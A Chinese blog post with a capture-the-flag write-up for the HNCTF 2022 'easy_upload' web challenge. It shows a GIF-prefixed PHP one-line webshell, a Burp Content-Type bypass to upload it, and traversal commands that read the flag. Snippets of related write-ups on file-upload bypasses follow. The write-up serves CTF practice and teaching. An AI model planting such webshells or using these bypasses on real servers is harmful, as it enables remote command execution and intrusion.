[HNCTF 2022 Week1]easy_upload

最新推荐文章于 2024-04-10 20:38:54 发布
最新推荐文章于 2024-04-10 20:38:54 发布
阅读量168 收藏
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_66013948/article/details/134032721
版权

        刚开始看到这道题的时候,毫无疑问,可以看出来这是一道文件上传漏洞,既然如此,就按照寻常的方法来做这一题,首先写一个文件叫getshell.php的文件,里面的内容为

GIF89a
<?php system($_GET['shell']);?>

之后使用burp抓包,将其文件类型改为image/jpeg之后放行就可以上传成功了,浏览器上能够有回显,之后我们访问这个文件,能发现浏览器有GIF89a的回显,那么就证明能访问到,之后,我们就可以通过get传参来获取flag,我们构造语句为

?shell=ls ../../../../

一次增加../的个数来查看文件夹,根据名称判断flag是否在里边,之后就构造

?shell=cat ../../../../../f*

来获取flag的值。

晓幂
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
HNCTF 2022 week1 web方向题解
m0_74160536的博客
08-01 740
简单说一下file伪协议,也是引用的别人博客(https://blog.csdn.net/qq_37466661/article/details/126203437)但正常情况下,我们输入php?filter=flag.php,只会发现一片空白,这时就需要用到php伪协议了,而这道题使用的就是file伪协议。检查-网络-刷新网页,只有两个网络响应,不过另一个是图标,不用管,打开cookie,提示去/f14g.php,跳转。打开环境,是一个小游戏,目标是2000分,不用管,小游戏题基本都是找js代码。
文件上传题目练习
最新发布
cyy001128的博客
06-03 604
用法:把一句话木马压缩成zip格式,shell.php -> shell.zip,然后再上传到服务器(后续通过前端页面上传也没有问题,通常服务器不会限制上传 zip 文件),再访问:?因为Apache默认一个文件可以有多个用.分割得后缀,当最右边的后缀无法识别(mime.types文件中的为合法后缀)则继续向左看,直到碰到合法后缀才进行解析(以最后一个合法后缀为准),可用来绕过黑名单过滤。这里因为尝试了很多绕过方式都不成功,去搜索了一下wp,发现要用到Phar://伪协议。尝试蚁剑连接,返回为空。
【CTF】[HNCTF 2022 Week1]easy_upload
西原一点红的博客
06-19 311
webshell工具连接,flag在/下 文件名ffflllaaaggg或者GET请求 获取/目录读取flag文件。
2022HNCTF-web
bossDDYY的博客
10-30 3240
应该和http协议有关 想要什么 肯定flag说我们不是admin 看看cookie修改cookie继续修改 x-forwarded-for [Week1]2048 分析 题目描述你能达到20000分吗?应该是要求我们玩到20000分F12查看脚本直接输入在控制台输入 [Week1]easy_html 分析 输入框限制了11位 f12修改html属性 或者直接post参数 [Week1]Interesting_include 分析 题目描述:web手要懂得搜索 应该要借助浏览器一眼伪协议base64解码 [
HNCTF 2022 Week1 easync
2301_79793667的博客
12-11 112
第一次查找,发现了个flag,但貌似是个假的flag,如输入进去还真是假的。里边有好多文件,我们只能耐心寻找,先是找到了flag的前一半。首先打开环境,发现并没有附件,那我们先进行nc连接。那我们只能再次寻找,看看真的flag到底藏在哪。将两部分拼接到一起,就是我们要找的flag。然后又找到了flag的后一半。
[HNCTF 2022 Week1]easy_html
J_linnb的博客
04-22 391
2.饼干的指的就是Cookie,查看Cookie,可以看到flagisin:%2Ff14g.php(解析后是:/f14g.php)3.访问该地址 ,要求我们输入手机号,发现输入框限制了位数,只能输入十位。第一种:按F12修改页面属性,将最大长度改为11。第二种:使用burpsuite提交post参数。抓包后将参数改为十一位数字,发送后出现flag。1.打开链接,提示饼干中好像有东西。接着输入十一位数字,找到flag。
HNCTF 2022 Week1 web方向
konpure的博客
04-10 232
进题代码如下,直接php伪协议读取。
HNCTF——web方向部分题解
m0_60715541的博客
11-01 1563
这是这次分享的题解的清单,主要是web的,等我啥时候有时间更新一波杂项的题解。
NSSCTF之Web篇刷题记录(13)
Aluxian_的博客
06-01 1166
【代码】NSSCTF之Web篇刷题记录(13)
文件上传漏洞
m0_70683009的博客
05-21 1182
如果对方中间件是apache属于低版本,我们可以利用文件上传,上传一个不识别的文件后缀,利用解析漏洞规则成功解析文件,其中的后门代码被执行。,可以被当作php文件进行解析,从最后一个.mmm开始,apache不认识,就往前走,一直到.php,这样即绕过了验证,有可以进行解析。⑤:不删除末尾的点,在后缀名加点(需要在抓到的数据包中加点,直接在文件后缀名加点会命名不成功,它会自动删除点)(2) 当上传文件.asp;上传可以上传的文件,在文件地址后加上/x.php,可以让文件以php代码去执行。
2022hgame-week1 wp
Anton1a的博客
01-28 1758
记录一下hgame比赛。 WEB easy_auth 打开题目是一个登录框 题目描述里有admin,那就随便输个弱口令抓包看一下 看见返回包有这个,就想到这个题肯定考察js,为验证一下想法看一下源代码,里面存在login.js打开看一下发现确实是前端验证的 之后就注册一个账号登录看一下登录成功的返回包 登录成功返回的结果如下: {"code":2000,"message":"success","count":0,"data":[{"token":"eyJ...
[HNCTF]crypto-wps
weixin_52118017的博客
10-28 2289
hnctf-crypto方面题解
什么是CGI?
z_ruitao的博客
12-02 5354
CGI(Common Gateway Interface),即通用网关接口,是WWW技术中最重要的技术之一,是外部应用程序(即CGI程序)与WEB服务器之间的接口标准,负责在CGI程序和Web服务器之间传递信息。 CGI是Web服务器运行时,调用外部应用程序(即CGI程序,如nginx fast-cgi)的规范,CGI规范允许Web服务器执行外部程序,并将它们的输出发送给Web浏览器,CGI将We...
ctf-第五周 | Easy upload
qq_29566629的博客
02-10 711
知识点: 要成功上传才能得到提示。 filename是文件格式 Content-type 是文件类型 要求文件内容里有什么内容,可以使用burp里的repeater直接进行增删改查。
[HFCTF 2022]两道web题目wp
cosmoslin的博客
03-28 6660
ezphp <?php (empty($_GET["env"])) ? highlight_file(__FILE__) : putenv($_GET["env"]) && system('echo hfctf2022');?> 看到这段代码不难联想到P神的博客 我是如何利用环境变量注入执行任意命令 题目给了一个docker用于本地搭建环境,可以发现题目用的系统环境为debian。在debian系操作系统中,sh指向dash;在centos系操作系统中,sh指向bash。 由于
hnctf-pwn-[week1]
m0_64174759的博客
11-20 1649
hnctf pwn week1 WP,栈溢出,格式化字符串,32位,64位rop,ret2shellcode,可见字符串,格式化字符串
[HNCTF 2022 WEEK2]ez_ssrf
07-27
\[HNCTF 2022 WEEK2\]ez_ssrf是一个题目或挑战的名称,它涉及到SSRF(Server-Side Request Forgery)攻击。在这个挑战中,通过构造恶意的请求,攻击者可以利用目标服务器发起未经授权的请求,可能导致信息泄露、远程...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值